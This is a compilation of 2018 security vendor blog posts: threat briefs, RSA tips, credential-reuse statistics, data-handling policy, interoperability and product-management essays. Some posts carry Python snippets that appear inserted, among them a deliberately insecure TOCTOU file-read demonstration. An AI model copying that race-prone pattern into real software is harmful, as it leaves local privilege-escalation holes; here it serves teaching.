
Threat Intelligence Brief: April 18, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.


“Great Western Railway urges online customers to update passwords after cyber-attack. The firm said hackers used an automated system to gain access to 1,000 customer accounts on its website and is taking action. While only a very small number of accounts have been affected by the attack, cybersecurity experts are complimenting the company’s proactive efforts to inform its customers of the best practice in these situations.”

 –The Sun


“A cyberattack that U.S. natural gas pipeline owners weren’t required to report has lawmakers taking a closer look at how the industry is handling such threats, raising the prospect of tighter regulation. In website notices to customers this week, at least seven pipeline operators from Energy Transfer Partners LP to TransCanada Corp. said their third-party electronic communications systems were shut down, with five confirming the service disruptions were caused by hacking. But the companies didn’t have to alert the U.S. Transportation Security Administration, the agency that oversees the nation’s more than 2.6 million miles of oil and gas conduits in addition to providing security at airports. Though the cyberattack didn’t disrupt the supply of gas to U.S. homes and businesses, it underscores that energy companies from power providers to pipeline operators and oil drillers are increasingly vulnerable to electronic sabotage. It also showed how even a minor attack can have ripple effects, forcing utilities to warn of billing delays and making it more difficult for analysts and traders to predict a key government report on gas stockpiles. At a congressional hearing in March, Maria Cantwell, a Democratic senator from Washington, told Perry that budget cuts could make it more difficult to shield the energy sector from cyber intrusions. ‘Our energy infrastructure is under attack,’ Cantwell said. ‘A year ago, I called for a comprehensive assessment of cyber attacks to our grid by Russians. We don’t need rhetoric at this point – we need action.’ The threat appears to be widespread. Two years ago, the Department of Energy’s Pacific Northwest National Laboratory in Richland, Washington, said its firewall system blocks 25,000 cyberattacks a day.”


Information Security Risk

“Several vulnerabilities have been found in the Linux command line tool Beep, including a potentially serious issue introduced by a patch for a privilege escalation flaw. An unnamed researcher discovered recently that Beep versions through 1.3.4 are affected by a race condition that allows a local attacker to escalate privileges to root. The security hole has been assigned CVE-2018-0492 and it has been sarcastically described as “the latest breakthrough in the field of acoustic cyber security research.” Someone created a dedicated website for it, a logo, and named it “Holey Beep.” The individual or individuals who set up the Holey Beep website have also provided a patch, but someone noticed that this fix actually introduces a potentially more serious vulnerability that allows arbitrary command execution.”

Security Week
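Race conditions like the one patched in Beep generally follow a time-of-check/time-of-use (TOCTOU) pattern: a permission check and the subsequent file operation leave a window in which the target can be swapped. A minimal Python sketch of the pattern and one mitigation (illustrative only; the actual Beep flaw is in C and specific to its setuid binary):

```python
import os
import tempfile

def insecure_read(path):
    """Classic TOCTOU pattern: the path could be replaced (e.g. with a
    symlink to a sensitive file) between the access() check and the
    open() call. Illustrative only -- not the actual Beep code."""
    if os.access(path, os.R_OK):        # time of check
        with open(path) as f:           # time of use: race window here
            return f.read()
    raise PermissionError(path)

def safer_read(path):
    """Avoid the race: open first (refusing symlinks where supported),
    then operate on the already-open descriptor."""
    fd = os.open(path, os.O_RDONLY | getattr(os, "O_NOFOLLOW", 0))
    try:
        return os.read(fd, 4096).decode()
    finally:
        os.close(fd)

# Demo on a temporary file
fd, path = tempfile.mkstemp()
os.write(fd, b"hello")
os.close(fd)
print(safer_read(path))  # hello
os.unlink(path)
```

The mitigation is the general "check the open descriptor, not the path" idiom; a privileged program would additionally drop privileges before touching user-controlled paths.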

Operational Risk

“The UK has conducted a “major offensive cyber-campaign” against the Islamic State group, the director of the intelligence agency GCHQ has revealed. The operation hindered the group’s ability to co-ordinate attacks and suppressed its propaganda, former MI5 agent Jeremy Fleming said. It is the first time the UK has systematically degraded an adversary’s online efforts in a military campaign. Mr Fleming made the remarks in his first public speech as GCHQ director. “The outcomes of these operations are wide-ranging,” he told the Cyber UK conference in Manchester. Mr Fleming said much of the cyber-operation was “too sensitive to talk about”, but had disrupted the group’s online activities and even destroyed equipment and networks. “This campaign shows how targeted and effective offensive cyber can be,” he added. But Mr Fleming said the fight against IS was not over, because the group continued to “seek to carry out or inspire further attacks in the UK” and find new “ungoverned spaces to base their operations”.”


The post Threat Intelligence Brief: April 18, 2018 appeared first on LookingGlass Cyber Solutions Inc..

5 Things to Do at RSA 2018

It's RSA Conference week! Are you excited? As you're putting last-minute plans together, check out our list of five things you should do while you're attending RSA Conference 2018 in San Francisco:


  1. Attend a Keynote

On Wednesday, April 18, Samir Kapuria, Senior Vice President and General Manager of Cyber Security Services at Symantec, will discuss how rethinking the future of cybersecurity means understanding its past in his session, At The Edge of Prediction: A Look Back to the Future of Cybersecurity.


  2. Party with us!

We don't want to get too ahead of ourselves, but some people are saying this might be "the party of the conference." RSVP for our party with DomainTools at 46 Minna. We'll have an open bar, hors d'oeuvres, and a DJ, plus you'll get to network with the best and brightest of the security industry.


  3. Visit the MOMA

When you have some time to spare, make sure to set aside an hour or two to soak up art and culture at San Francisco's Museum of Modern Art. Just steps away from the Moscone Center, you can take a breather from the hectic show floor and enjoy a moment of reflection at the museum.


  4. Eat at Hops & Hominy

It's no secret that we love our craft brews over here at ThreatConnect. So it wouldn't be right if we didn't recommend a trip to Hops & Hominy for southern soul food and a variety of microbrews. If you make it a meal there, make sure to stop by our booth and let us know which you loved more: the comfort food or the 21 rotating beers on tap.


  5. Stop by the ThreatConnect booth!

Don't miss the reveal of our next t-shirt and your chance to see a personalized demo. We'll also be raffling off a DJI Mavic Drone. With all this fun in store, ours should be the first booth you head to when the show floor opens (and yes, we are a little biased). You can find us at booth #3231 in the North Hall.


See you there!

The post 5 Things to Do at RSA 2018 appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

RSA Preview: Compromised Credentials are STILL Your Organization’s Worst Nightmare

RSA, arguably the industry’s biggest conference, starts this week. Before you get blinded by all of the shiny new technology and product and acquisition announcements, remember that good cybersecurity hygiene begins with the basics – patch and routinely update your systems, educate your employees, and protect your passwords.

LookingGlass has access to a lot of places on the Internet, including the Deep and Dark Web, where most data dumps and password leaks occur. Armed with this information, we maintain a proprietary Data Breach Detection System (DBDS) that continuously scours underground forums, hacker channels, and the dark web to uncover the latest data breaches and identify compromised accounts. Adding an average of several million findings per week, this system contains almost 5 billion records that are connected to approximately 3.5 billion unique username/password pairs.

As cyber attacks increase in size and sophistication, we often forget that some of the biggest attacks started with basic password cracking or a phishing/social engineering scheme. Analyzing compromised credentials can reveal a lot about the cybersecurity practices of organizations of all sizes, across verticals. LookingGlass reviewed all compromised credentials within our DBDS from 2017 for the Fortune 100 companies and discovered that the most heavily impacted business sectors were Technology, Financial, Insurance, and Telecommunications. The chart below compares the unique credentials LookingGlass uncovered in 2017 for the Fortune 100 companies by sector.

In addition, across all Fortune 100 companies, an average of 33% of all employees reused their login credentials. Organizations within the Telecommunications sector represented the highest percentage of reused login credentials, with nearly 45% of employees reusing usernames and passwords across multiple IT systems and web applications.
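A reuse figure like the 33% above can be computed from a credential dump by checking whether the same password hash appears for a given employee on more than one system. A hypothetical sketch (the record layout and sample data are illustrative, not LookingGlass's actual schema):

```python
from collections import defaultdict

def reuse_rate(records):
    """records: iterable of (employee, system, password_hash) tuples.
    An employee 'reuses' credentials if the same password hash appears
    for them on more than one system. Returns the fraction of employees
    with at least one reused password."""
    per_user = defaultdict(lambda: defaultdict(set))
    for employee, system, pw_hash in records:
        per_user[employee][pw_hash].add(system)
    reusers = sum(
        1 for systems_by_hash in per_user.values()
        if any(len(systems) > 1 for systems in systems_by_hash.values())
    )
    return reusers / len(per_user) if per_user else 0.0

sample = [
    ("alice", "vpn",     "h1"),
    ("alice", "webmail", "h1"),   # same hash on two systems -> reuse
    ("bob",   "vpn",     "h2"),
    ("bob",   "webmail", "h3"),
    ("carol", "vpn",     "h4"),
]
print(reuse_rate(sample))  # 1 of 3 employees reuses -> ~0.33
```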

Credential reuse is a significant concern to organizations across all business sectors because threat actors routinely use lists of these compromised credentials to gain access to business networks via web applications and other public-facing network infrastructure.  For example, it is simple for a threat actor to check for Web-based email services associated with each domain, potentially allowing a hacker to access the user’s work email account and to view or exfiltrate any sensitive information it may contain.

Assuming that the LookingGlass sample for Fortune 100 companies is a reflection of global organizational trends in credential security hygiene, we judge that at least one-third to one-half of the compromised credentials could likely facilitate illicit access, or cause otherwise negative repercussions, to many organizations. This threat is further exacerbated if an organization is unaware of credential compromises relevant to them or does not have other security measures in place to mitigate the risk of compromised credentials, such as two-factor authentication.

4 Steps Organizations Can Take to Protect User Credentials

  1. Encourage and Enforce Password Hygiene Best Practices – Educate employees on best practices associated with password hygiene (e.g., frequently change credentials, diversify passwords across accounts). Require employees to routinely update their passwords and avoid repeated use across multiple platforms.
  2. Manage Your Third Party Risks – Consistently monitor who is accessing your network and hardware. Are they trying to access areas of the network they shouldn’t be? Limit third parties’ access to specific portions of the network instead of allowing them to roam free.
  3. Back Up Your Data! – If your credentials are compromised and data is lost or locked, it is far easier to restore from a backup than to start from scratch.
  4. Educate Your Employees – Phishing attacks are still one of the biggest ways organizations are breached. Don’t give away confidential information, like your password.
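The "avoid repeated use" rule in step 1 can be enforced mechanically at password-change time, for example by keeping a history of salted password hashes and rejecting any match. A minimal sketch (the salt handling and iteration count are illustrative only; a real system would use a per-password random salt and also check length and breach lists):

```python
import hashlib

def _hash(password, salt):
    # PBKDF2 with SHA-256; 100k iterations is an illustrative figure
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def password_allowed(new_password, history, salt):
    """Reject a new password that matches any previously used one.
    `history` is a list of stored PBKDF2 hashes."""
    return _hash(new_password, salt) not in history

salt = b"demo-salt"  # illustrative; use a random per-user salt in practice
history = [_hash("Spring2017!", salt)]
print(password_allowed("Spring2017!", history, salt))           # False -> reuse blocked
print(password_allowed("correct horse battery", history, salt)) # True
```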


How Can LookingGlass Help With These Steps?

LookingGlass offers tiered solutions to help organizations deal with the risks compromised credentials pose to you and your key vendors:

  • The LookingGlass Baseline Attack Surface Report™ is a cost-effective first step in determining which of your vendors pose the most risk to your organization. Your report will not only provide a historical analysis but also help you meet compliance and regulatory requirements when the occasion arises.
  • The LookingGlass Cyber Attack Surface Analysis™ is a deep-dive assessment of vendors that may have access to your organization’s networks and sensitive data. It not only provides a historical analysis of potential compromise, but may also assist your organization in meeting compliance and regulatory requirements. In addition, the Cyber Attack Surface Analysis can evaluate the cybersecurity hygiene of a company when conducting M&A activity.
  • The LookingGlass Third Party Risk Monitoring service delivers continuous visibility into the risk exposure and attack surface of your organization’s key vendors. This is an outsourced way to analyze your third-party vendors’ risk impact to your organization. Our managed service keeps a watchful eye on your vendors’ networks 24/7/365, helping you make informed, intelligent decisions about the cyber safety of your organization.


In addition, protect your organization’s attack surface with one of the LookingGlass “as-a-Service” offerings: Information Security, Brand Security, or Physical Security Monitoring:

  • Information Security-as-a-Service™: Protect your organization’s network and sensitive data. LookingGlass analysts monitor and identify information security threats such as phishing, malware, ransomware, and more.
  • Brand Security-as-a-Service™: Protect your organization’s brand, trademarks/logos, intellectual property, and online reputation.
  • Physical Security Monitoring-as-a-Service™: LookingGlass analysts monitor for risks to your organization’s most valuable physical assets, such as imposter social media accounts, unauthorized domain names, and threats against employees, executives, and facilities.

Interested in learning more about any of our offerings, or want to chat with one of our security experts? Find us at RSA – Booth 100 in the South Hall.

The post RSA Preview: Compromised Credentials are STILL Your Organization’s Worst Nightmare appeared first on LookingGlass Cyber Solutions Inc..

The Power and Responsibility of Customer Data and Analytics

How ThreatConnect stores, uses, and protects customer data


There has been a lot of recent news surrounding compromises in trust where companies purposefully or unintentionally misuse or allow others to misuse customer data. After my last post, in which I talked about the power of data and analytics, I thought it would be a good time to describe ThreatConnect's efforts around storing, using, and protecting our customers' data.




Let me start by explaining the types of data that reside in the ThreatConnect Cloud and CAL™ (Collective Analytics Layer) and how that data is stored and used. I'm not going to speak to Dedicated Cloud or On-Premises, because those platform configurations are often customized based on organizational policies or regulatory requirements.  


ThreatConnect Cloud consists of the Multi-Tenant ThreatConnect Cloud and CAL™. Users (both free and paid) interact with the ThreatConnect Cloud through either direct logins or integrations with other technologies. ThreatConnect Cloud data is stored in a user's own private account or organization, a community, or a source, and restrictions on sharing and usage are specific to the location the data is stored within.


Where data resides   | Data Owner   | Data Users
Individual Account   | Individual   | Only the individual
Organization Account | Organization | All users of the organization
Community            | Community    | Access granted by community administrators
Data Source          | Source Owner | Access granted by source administrators to source participants
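The scope rules in the table above amount to a simple access check: a record is visible only to users of the scope it is stored in. A hypothetical sketch (the field names and data model are illustrative, not ThreatConnect's actual implementation):

```python
def can_read(user, record):
    """Return whether `user` may read `record`, following the table above:
    individual data is owner-only, organization data is org-wide, and
    community/source data requires an explicit administrator grant."""
    scope = record["scope"]
    if scope == "individual":
        return user["id"] == record["owner"]
    if scope == "organization":
        return user["org"] == record["owner"]
    if scope in ("community", "source"):
        return user["id"] in record.get("granted", set())
    return False

rec = {"scope": "organization", "owner": "acme"}
print(can_read({"id": "u1", "org": "acme"}, rec))   # True
print(can_read({"id": "u2", "org": "other"}, rec))  # False
```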


Data sharing to a community is up to the organization or user that owns the data. ThreatConnect acts as a member of some of the communities, and as such, has the same rights and privileges as all of its members.

For example, we may be a member of a particular industry community whose rules allow anyone to use data shared under traffic light protocol (TLP): White guidelines. If a community administrator invited us to the community, and the data was marked TLP:WHITE, any vetted community member could leverage the information in some aspect of their work. To reiterate, this means that ThreatConnect would only use said data by virtue of our membership in the community, in accordance with the community usage guidelines.

ThreatConnect CAL collects anonymous data from all participating instances of ThreatConnect, including ThreatConnect Cloud. Through large data analysis, CAL provides insights and recommendations that are delivered back to any participating ThreatConnect instance - Cloud, Dedicated Cloud, and On-Premises. These insights can take many forms, including classification of indicators and indicator reputation. We've designed these insights to be a boost to in-platform analytics, such as ThreatAssess and Playbooks.  

Users of Dedicated Cloud and On-Premises instances of the Platform can choose whether they want to leverage CAL or not. When turned off, both anonymous sharing with CAL and CAL insights are disabled. If you want to have the benefits of CAL, but keep some indicators private, you can also do that by marking indicators as private in your instance. The table below summarizes the data CAL collects from participants, and the value it derives from the data:


Customer Data Used by CAL    | Value Provided
IOC False Positive Vote (count) | Provides a count of false positives across CAL-connected platforms and drives CAL recommendations for reputation and indicator status.
IOC Impressions (count)      | Provides a count of page views, searches, and automated lookups and drives CAL recommendations for reputation and indicator status.
IOC Observations (count)     | Provides a count of reported observations of an IOC across CAL-connected platforms and drives CAL recommendations for reputation and indicator status.
IOC Status (active/inactive) | Provides a holistic picture of which indicators users want to keep active or inactive in their instance, allowing CAL to recommend better indicator status and reduce time wasted on "junk" IOCs for participants.
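The anonymized, aggregated collection described here can be pictured as dropping instance identifiers and keeping only per-indicator counts, so the result records how many participants reported a signal, never who. A hypothetical sketch, not CAL's actual pipeline:

```python
from collections import Counter

def aggregate_cal_telemetry(submissions):
    """Aggregate anonymized telemetry: instance identifiers are never
    read, and only per-IOC counts survive the aggregation."""
    false_positives, observations = Counter(), Counter()
    for sub in submissions:
        ioc = sub["ioc"]          # sub["instance_id"] is deliberately ignored
        if sub["type"] == "false_positive":
            false_positives[ioc] += 1
        elif sub["type"] == "observation":
            observations[ioc] += 1
    return false_positives, observations

subs = [
    {"instance_id": "i-1", "ioc": "evil.example", "type": "observation"},
    {"instance_id": "i-2", "ioc": "evil.example", "type": "observation"},
    {"instance_id": "i-3", "ioc": "evil.example", "type": "false_positive"},
]
fp, obs = aggregate_cal_telemetry(subs)
print(obs["evil.example"], fp["evil.example"])  # 2 1
```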


To reiterate, all of the above information is captured and processed in an anonymized, aggregated fashion. After authentication, any identifying information about your instance is separated from the data before it is combined, so our analytics understand how to treat the data without knowing where it came from. To put it another way, we don't track or care about who submitted any of the above information, but rather how many participants submitted it.

Finally, ThreatConnect software instances may be connected to our user feedback platform in order for our product managers and customer success personnel to learn more about our customers' usage. This is common among most software vendors, as the insights gleaned allow our company to improve our software experience and identify data-driven ways to help our users do their jobs better. Participation in this platform also enables us to deliver interactive guides in the application to help users hit the ground running. Dedicated Cloud and On-Premises software instances can turn off this feature if they want.  

Your data and privacy are of the utmost importance to us. We have made, and continue to make, major investments to protect the data you entrust to us. Our Information Security Management System (ISMS) is built on the ISO 27001:2013 set of standards to ensure that we appropriately secure ThreatConnect. We've also researched GDPR extensively and are taking action to ensure compliance.

If you have any questions regarding our corporate security program or your data privacy, please use the CONTACT US form and select "Security Program/Compliance" from the dropdown menu.

The post The Power and Responsibility of Customer Data and Analytics appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Why Cyber Response Mechanisms Must Talk to Each Other…

As I was preparing to write this blog on the importance of interoperability across cyber defense systems, I read the following news article: “Why America’s Two Best Fighter Jets Can’t Talk to Each Other”. One of the salient points in this article is that, reportedly, the communication system in the newer-model fighter jet is not integrated with that of the older model.

Two quotes from the article particularly drew my attention:

“The U.S. fifth-generation jets are adept at disseminating a more detailed view of the battle space to older aircraft, increasing the former’s “survivability” in combat…”

“The thing that’s great about having Link 16 and MADL onboard and the sensor fusion is the amount of situational awareness the pilot has…”

An integrated communication system is a vital part of these fighter jets and the combined strength those fighters provide. A similar point can be made about the lack of interoperability and easy integration in cyber defense between cybersecurity systems.

The issues these fighter jets have illustrate the technical, business, and organizational challenges that can get in the way of technology integrations necessary for the effective use of technology intended to protect and defend. More importantly, the impact on the security of organizations can be significant when defensive systems are not integrated in meaningful and effective ways.

Recently, I had the opportunity to discuss the key challenges faced in cyber defense integration in a joint webinar with Jason Keirstead (IBM Security) and Henry Peltokangas (Cisco Systems) on Cyber Threat Intelligence Collaboration.


Why does interoperability matter?

Whether at a small or medium enterprise or the largest multi-national organization, most security deployments generally share these common characteristics:

No Single Vendor

  • Typically, there is no single vendor that has deployed all of the systems that must exchange Cyber Threat Intelligence (CTI) and Security telemetry (e.g. events, logs).
  • Many organizations choose best of breed for firewalls vs. identity authentication vs. Intrusion Detection Systems (IDS) vs. web proxies vs. threat analysis platforms.


  • One of the primary reasons for having different products (from different vendors) in a security deployment is that each product performs vital tasks and functions and may not even be run or operated by the same security analysis and security operations teams.

Coordinated Action

  • Teams and their respective products must work collaboratively to collect, analyze, refine, and ultimately operationalize CTI.
  • The complexity involved in building security systems can be quite daunting but it becomes even more complex if those systems need to share data and actions to make security work successfully.
  • Oftentimes, real-time data may indicate a threat that must be acted upon quickly, but without suitable interoperable systems working collaboratively, it is almost impossible to provide an effective real-time response.

Ultimately, the goals for interoperability are to drive ease of deployment, ease of maintenance, and ensure that complex systems tasks can be performed when they connect together.

Sounds easy?

Here’s a recent example that helps explain the challenge:

Real World Technology Fail Example

In this scenario, a multi-national organization purchased a Threat Intelligence Platform (TIP) from one vendor and an Endpoint Protection system from a second vendor. Both vendors had developed their products to exchange OASIS STIX/TAXII Version 1 standards-based intelligence. Both vendors claimed their products supported the standard protocol and content.

When the multi-national organization came to connect those systems together the TIP and Endpoint Protection system failed to exchange intelligence correctly. After initially trying to debug the issue themselves, the organization escalated the integration challenges to both vendors to resolve the communication issues.

Fortunately, in this scenario both vendors were able to investigate and come up with a solution to integrate the CTI products successfully. However, the reality is that even with standards (as a basis for security integration), there remains ample opportunity for technology companies to miss important aspects that end up sabotaging off-the-shelf integration with other vendors.
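One inexpensive way to catch this class of mismatch is a pre-flight check that validates intelligence against the fields the consuming product requires, before the systems are wired together in production. A sketch using STIX 2.1-style JSON for brevity (the incident above involved the XML-based STIX/TAXII Version 1; the required-field set shown follows the STIX 2.1 Indicator object):

```python
import json

# Fields the hypothetical consuming product requires on an indicator
REQUIRED = {"type", "spec_version", "id", "created", "modified",
            "pattern", "pattern_type", "valid_from"}

def preflight_check(doc_json):
    """Return the sorted list of required fields missing from the
    intelligence document -- empty means the exchange should succeed."""
    doc = json.loads(doc_json)
    return sorted(REQUIRED - doc.keys())

indicator = json.dumps({
    "type": "indicator",
    "spec_version": "2.1",
    "id": "indicator--00000000-0000-4000-8000-000000000000",
    "created": "2018-04-18T00:00:00Z",
    "modified": "2018-04-18T00:00:00Z",
    "pattern": "[domain-name:value = 'evil.example']",
    "pattern_type": "stix",
    # "valid_from" omitted: one vendor emits it, the other requires it
})
print(preflight_check(indicator))  # ['valid_from']
```

A check like this surfaces the "both claim to support the standard" gap as a named missing field rather than a failed production integration.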

The Impact

The above example shows the negative consequences that integrating products from various vendors can have on security. More specifically, the following areas are most impacted:

Expertise & Human Assets

  • Expertise is needed to understand, at a technical level, what is and is not working.
  • Organizations have to learn far more about how each technology shares content between systems.
  • It takes time to hire or train people, and to learn the different product interfaces, instead of just expecting them to ‘work’.

Time & Costs

  • Multiple days or weeks to make it ‘work’.
  • Multiple organizations involved.
  • Costs of people and systems time without operational benefits.


Product Limitations

  • Point products have limits to the features they provide as standalone solutions.
  • Point products are limited in what they can detect and block when they are not part of an integrated system.
  • Introducing CTI into deployments of multiple point products results in the worst case: each product has its own blacklist or method of consuming the intelligence, and the security team has to manually copy/paste the intelligence into each.
  • Manual handling adds huge amounts of human error that can undermine protection.
  • In many cases, the lack of coordinated capability can cause unexpected results and, worse, undermine protection.
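The copy/paste problem described in the bullets above is typically addressed by normalizing intelligence once and rendering it automatically into each product's native format. A sketch with hypothetical output formats (neither the firewall rule syntax nor the proxy denylist format refers to a real product):

```python
def to_firewall(iocs):
    # Hypothetical CLI-style deny rules for a generic firewall
    return [f"deny ip any host {i}" for i in iocs]

def to_proxy(iocs):
    # Hypothetical one-domain-per-line denylist for a generic web proxy
    return "\n".join(iocs)

def distribute(iocs, exporters):
    """Replace per-product copy/paste with one normalized feed:
    dedupe and canonicalize once, then render the same intelligence
    into each product's native format."""
    canonical = sorted({i.strip().lower() for i in iocs})
    return {name: render(canonical) for name, render in exporters.items()}

out = distribute(
    ["Evil.example", "evil.example ", "bad.example"],
    {"firewall": to_firewall, "proxy": to_proxy},
)
print(out["firewall"])  # ['deny ip any host bad.example', 'deny ip any host evil.example']
```

Because every product consumes the same canonical list, an update propagates everywhere in one step instead of N manual ones.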

As a result, the true winners are the adversaries.

What should we do?

There are a few ways to improve and implement interoperability in your organization. In my next blog, I’ll give you some best practices including:

  • STIX Preferred program
  • Key interoperability tenets

If you want to discuss this blog or integrated LookingGlass cyber defense solutions, please reach out to me on Twitter (@tweet_a_t) or contact us. If you are going to RSA 2018, please come to the STIX and TAXII Meet-up on April 18, 2018 to chat with me more on this topic.


The post Why Cyber Response Mechanisms Must Talk to Each Other… appeared first on LookingGlass Cyber Solutions Inc..

Threat Intelligence Brief: April 11, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.

Information Security Risk

“Retailer Hudson’s Bay Co disclosed that it was the victim of a security breach that compromised data on payment cards used at Saks and Lord & Taylor stores in North America. One cyber security firm said that it has evidence that millions of cards may have been compromised, which would make the breach one of the largest involving payment cards over the past year, but added that it was too soon to confirm whether that was the case. Hacking group JokerStash a.k.a. Fin7 is alleged to have spent a year collecting payment card records with the intention of selling the compromised accounts on the dark web.”


Insurance + Healthcare

“New Jersey’s Division of Consumer Affairs is levying a fine against Virtua Medical Group after the provider organization suffered a breach that released the protected health information of several hundred of its patients two years ago. The network of physicians, which spans more than 50 South Jersey practices and is part of the Virtua Health delivery system, will pay a total of $417,816 and improve data security following a breach of protected health information affecting 1,654 patients whose health records were found to be viewable on the Internet because of a server misconfiguration by a vendor in January 2016.”

Health Data Management


“Sears Holding Corp, Best Buy, and Delta Air Lines have announced that some of their customer payment information may have been exposed in a cyber security breach at software service provider [24]7.ai. In a statement made by Delta Air Lines, cybercriminals planted a piece of malware in [24]7.ai software, which captured some payment card data between September 26 and October 12, 2017. Sears and Delta said they were only notified by [24]7.ai in mid- and late March, several months after the breach had been supposedly contained.”


Operational Risk

“Malaysia’s central bank announced that it has suffered a cyberattack in which hackers sought to steal money through fraudulent wire transfers over the SWIFT network. The bank did not disclose who was behind the attack or how they accessed its SWIFT servers while also noting that no funds were lost. The incident marked the second known hack of a central bank after the 2016 theft of $81 million from the Bangladesh Bank.”


The post Threat Intelligence Brief: April 11, 2018 appeared first on LookingGlass Cyber Solutions Inc..

Security Product Management at Large Companies vs. Startups

Is it better to perform product management of information security solutions at a large company or at a startup? Picking the setting that’s right for you isn’t as simple as craving the exuberant energy of a young firm or coveting the resources and brand of an organization that’s been around for a while. Each environment has its challenges and advantages for product managers. The type of innovation, nature of collaboration, sales dynamics, and cultural nuances are among the factors to consider when deciding which setting is best for you.

The perspective below is based on my product management experiences in the field of information security, though I suspect it’s applicable to product managers in other high-tech environments.

Product Management at a Large Firm

In the world of information security, industry incumbents are usually large organizations. This is in part because growing in a way that satisfies investors generally requires the financial might, brand and customer access that’s hard for small cyber-security companies to achieve. Moreover, customers who are not early adopters often find it easier to focus their purchasing on a single provider of unified infosec solutions. These dynamics set the context for the product manager’s role at large firms.

Access to Customers

Though the specifics differ across organizations, product management often involves defining capabilities and driving adoption. The product manager’s most significant advantage at a large company is probably access to customers. This is due to the size of the firm’s sales and marketing organization, as well as to the large number of companies that have already purchased some of the company’s products.

Such access helps with understanding requirements for new products, improving existing technologies, and finding new customers. For example, you could bring your product to a new geography by using the sales force present in that area without having to hire a dedicated team. Also, it’s easier to upsell a complementary solution than build a new customer relationship from scratch.

Access to Expertise

Another benefit of a large organization is access to funds and expertise that’s sometimes hard to obtain in a young, small company. Instead of hiring a full-time specialist for a particular task, you might be able to draw upon the skills and experience of someone who supports multiple products and teams. In addition, assuming your efforts receive the necessary funding, you might find it easier to pursue product objectives and enter new markets in a way that could be hard for a startup to accomplish. This isn’t always easy, because budgetary planning in large companies can be more onerous than venture-capital fundraising.

Organizational Structure

Working in any capacity at an established firm requires that you understand and follow the often-changing bureaucratic processes inherent to any large entity. Depending on the organization’s structure, product managers in such environments might lack the direct control over the teams vital to the success of their product. Therefore, the product manager needs to excel at forming cross-functional relationships and influencing indirectly. (Coincidentally, this is also a key skill-set for many Chief Information Security Officers.)

Sometimes even understanding all of your own objectives and success criteria in such environments can be challenging. It can be even harder to stay abreast of the responsibilities of others in the corporate structure. On the other hand, one of the upsides of a large organization is the room to grow one’s responsibilities vertically and horizontally without switching organizations. This is often impractical in small companies.

What It’s Like at a Large Firm

In a nutshell, these are the characteristics inherent to product management roles at large companies:

  • An established sales organization, which provides access to customers
  • Potentially conflicting priorities and incentives among groups and individuals within the organization
  • Rigid organizational structure and bureaucracy
  • Potentially-easier access to funding for sophisticated projects and complex products
  • Possibly-easier access to the needed expertise
  • Well-defined career development roadmap

I loved working as a security product manager at a large company. I was able to oversee a range of in-house software products and managed services focused on data security. One of my solutions involved custom-developed hardware with integrated home-grown and third-party software, serviced by a team of help desk and in-the-field technicians. A fun challenge!

I also appreciated the chance to develop expertise in the industries my employer served, so I could position infosec benefits in a context relevant to those customers. I enjoyed staying abreast of the social dynamics and politics of a siloed, matrixed organization. After a while I decided to leave because I was starting to feel a bit too comfortable. I had also developed an appetite for risk and began craving the energy inherent to startups.

Product Management in a Startup

One of the most liberating, yet scary aspects of product management at a startup is that you’re starting the product from a clean slate. While product managers at established companies often need to account for legacy requirements and internal dependencies, a young firm is generally free of such entanglements, at least at the outset of its journey.

What markets are we targeting? How will we reach customers? What comprises the minimum viable product? Though product managers ask such questions in all types of companies, startups are less likely to survive erroneous answers in the long term. Fortunately, short-term experiments are easier to perform to validate ideas before making strategic commitments.

Experimenting With Capabilities

Working in a small, nimble company allows the product manager to quickly experiment with ideas, get them implemented, introduce them into the field, and gather feedback. In the world of infosec, rapidly iterating through defensive capabilities of the product is useful for multiple reasons, including the ability to assess—based on real-world feedback—whether the approach works against threats.

Have an idea that is so crazy, it just might work? In a startup, you’re more likely to have a chance to try some aspect of your approach, so you can rapidly determine whether it’s worth pursuing further. Moreover, given the mindshare that the industry’s incumbents have with customers, fast iterations help understand which product capabilities, delivered by the startup, the customers will truly value.

Fluid Responsibilities

In all companies, almost every individual has a certain role for which they’ve been hired. Yet, the specific responsibilities assigned to that role in a young firm often benefit from the person’s interpretation, and are based on the person’s strengths and the company’s need at a given moment. A security product manager working at a startup might need to assist with pre-sales activities, take a part in marketing projects, perform threat research and potentially develop proof-of-concept code, depending on what expertise the person possesses and what the company requires.

People in a small company are less likely to have the “it’s not my job” attitude than those in highly structured, large organizations. A startup generally has fewer silos, making it easier to engage in activities that interest the person even if they are outside his or her direct responsibilities. This can be stressful and draining at times. On the other hand, it makes it difficult to get bored, and it also gives the product manager an opportunity to acquire skills in areas tangential to product management. (For additional details, see my article What’s It Like to Join a Startup’s Executive Team?)

Customer Reach

A product manager’s access to customers and prospects at a startup tends to be more immediate and direct than at a large corporation. This is in part because of the many hats the product manager needs to wear, sometimes acting as a sales engineer and at other times helping with support duties. These tasks give the person the opportunity to hear unfiltered feedback from current and potential users of the product.

However, until the firm builds up steam, a young company simply lacks a sales force with the scale needed to reach many customers. (See Access to Customers above.) This means that the product manager might need to help identify prospects, which can be outside the comfort zone of individuals who haven’t participated in sales efforts in this capacity.

What It’s Like at a Startup

Here are the key aspects of performing product management at a startup:

  • Ability and need to iterate faster to get feedback
  • Willingness and need to take higher risks
  • Lower bureaucratic burden and red tape
  • Much harder to reach customers
  • Often fewer resources to deliver on the roadmap
  • Fluid designation of responsibilities

I’m presently responsible for product management at Minerva Labs, a young endpoint security company. I’m loving the make-or-break feeling of the startup. For the first time, I’m overseeing the direction of a core product that’s built in-house, rather than managing a solution built upon third-party technology. It’s gratifying to be involved in the creation of new technology in such a direct way.

There are lots of challenges, of course, but every day feels like an adventure as we fight for a seat at the big kids’ table, grow the customer base and break new ground with innovative anti-malware approaches. It’s a risky environment with high highs and low lows, but it feels like the right place for me right now.

Which Setting is Best for You?

Numerous differences between startups and large companies affect the experience of working in these firms. The distinction is especially pronounced for product managers, who oversee the creation of the solutions sold by these companies. You need to understand these differences before deciding which environment is best for you, but that’s just a start. Next, understand what is best for you given where you are in life and your professional development. Sometimes the capabilities you’ll have as a product manager in an established firm will be just right; at other times, you will thrive in a startup. Work in the environment that appeals to you, but also know when (or whether) it’s time to make a change.

Compromising ShareFile on-premise via 7 chained vulnerabilities

